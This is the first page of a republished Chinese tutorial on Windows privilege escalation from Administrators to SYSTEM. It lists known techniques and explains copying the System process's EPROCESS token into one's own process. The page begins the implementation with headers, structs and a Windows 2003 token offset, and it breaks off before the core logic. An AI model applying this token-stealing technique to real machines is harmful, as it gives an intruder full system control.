　关于管理员组(administrators)获取系统(SYSTEM)权限的方法其实已经有很多种了.
小四哥就提到了一些:"MSDN系列(3)--Administrator用户直接获取SYSTEM权限"和"远程线程注入版获取SYSTEM权限".
这里,我先踩在前辈的肩上列一些可行的方法:

1. "利用ZwCreateToken()自己创建一个SYSTEM令牌(Token)"
2. HOOK掉创建进程的函数ZwCreateProcess(Ex),用winlogon ID 创建
3. 远线程插入，插入线程到系统进程，创建一新进程

这上面三种方法都是scz提到的,也存在一些问题.其实除此这外,我们还可以:
4. 将程序做成服务，带参数运行新进程

做为服务来讲就是SYSTEM了,再创建的进程也是SYSTEM权限.

当然,这里我都不会用到上面提到的方法.因为网上都能找到现成的实现代码.而且考虑一些复杂性以及存在的一些问题都不是很好的解决方案.

这里,我拿出两种新的方案来实现该功能:

第一种方法.我们先来看一下系统是如何进行权限检测的，
举个例子,在调用了OpenProcessToken,我们知道会进行权限的验证：
OpenProcessToken->NtOpenProcessToken－>PsOpenTokenOfProcess->PsReferencePrimaryToken->找到这一句Token = Process->Token;
　　　　　　　　　　　　　　　　　 |->ObOpenObjectByPointer调用上面返回的TOKEN进行检查

也就是说，系统在检测权限时仅仅通过从进程的EPROCESS结构种拿出Token项进行操作.因此我们不需要继续往ObOpenObjectByPointer里面跟进了。
思路已经很明显：直接将System进程的Token拿过来，放到我们进程的Token位置。那么系统就认为我们是SYSTEM权限.
而这时我们的进程创建的子进程也就是SYSTEM权限了。(以上分析过程请参考WINDOWS源代码...^_^)

实现代码:
===========================================================================================================
#include<windows.h>
#include<stdio.h>
#include<Accctrl.h>
#include<Aclapi.h>

#define TOKEN_OFFSET 0xc8 //In windows 2003, it's 0xc8, if others' version, change it
#define NT_SUCCESS(Status)　　　　　　((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH　　　　((NTSTATUS)0xC0000004L)
#define STATUS_Access_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG　NTSTATUS;
typedef struct _IO_STATUS_BLOCK
{
　 NTSTATUS　　Status;
　 ULONG　　　　Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING
{
　 USHORT　　　　Length;
　 USHORT　　　　MaximumLength;
　 PWSTR　　　　Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

#define OBJ_INHERIT　　　　　　 0x00000002L
#define OBJ_PERMANENT　　　　　 0x00000010L
#define OBJ_EXCLUSIVE　　　　　 0x00000020L
#define OBJ_CASE_INSENSITIVE　　0x00000040L
#define OBJ_OPENIF　　　　　　　0x00000080L
#define OBJ_OPENLINK　　　　　　0x00000100L
#define OBJ_KERNEL_HANDLE　　　 0x00000200L
#define OBJ_VALID_ATTRIBUTES　　0x000003F2L

typedef struct _OBJECT_ATTRIBUTES
{
　 ULONG　　　　Length;
　 HANDLE　　　　RootDirectory;
　 PUNICODE_STRING ObjectName;
　 ULONG　　　　Attributes;
　 PVOID　　　　SecurityDescriptor;
　 PVOID　　　　SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;　

typedef struct _SYSTEM_MODULE_INFORMATION
{
　 ULONG Reserved[2];
　 PVOID Base;
　 ULONG Size;
　 ULONG Flags;
　 USHORT Index;
　 USHORT Unknown;
　 USHORT LoadCount;
　 USHORT ModuleNameOffset;

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] 下一页

上一篇:用Server2003搭建安全文件服务器

下一篇:修改Win2000注册表以加强系统安全

管理员组获取系统权限的完美解决方案相关文章：

·Windows 2003安全设置大全-系统权限与安全配置

·管理员组获取系统权限的完美解决方案

·SQL注入实战---利用“dbo”获得SQL管理权限和系统权限

·mysql获得系统权限

·MSSQL db_owner角色注入直接获得系统权限

·利用“dbo”获得SQL管理权限和系统权限

·MSSQL db_owner注入获得系统权限

·黑客技巧之通过系统权限法来清理dll木马

·B/S系统权限控制的一种简单方法

管理员组获取系统权限的完美解决方案相关软件：

·public也能拿到webshell及系统权限

特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员，我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源：http://www.viphot.com

	\| 帮助(？) \| 版权声明 \| 友情连接 \| 关于我们 \| 信息发布
Copyright 2007 www.viphot.com All Rights Reserved.	鄂ICP备05000083号Powered by:vipcn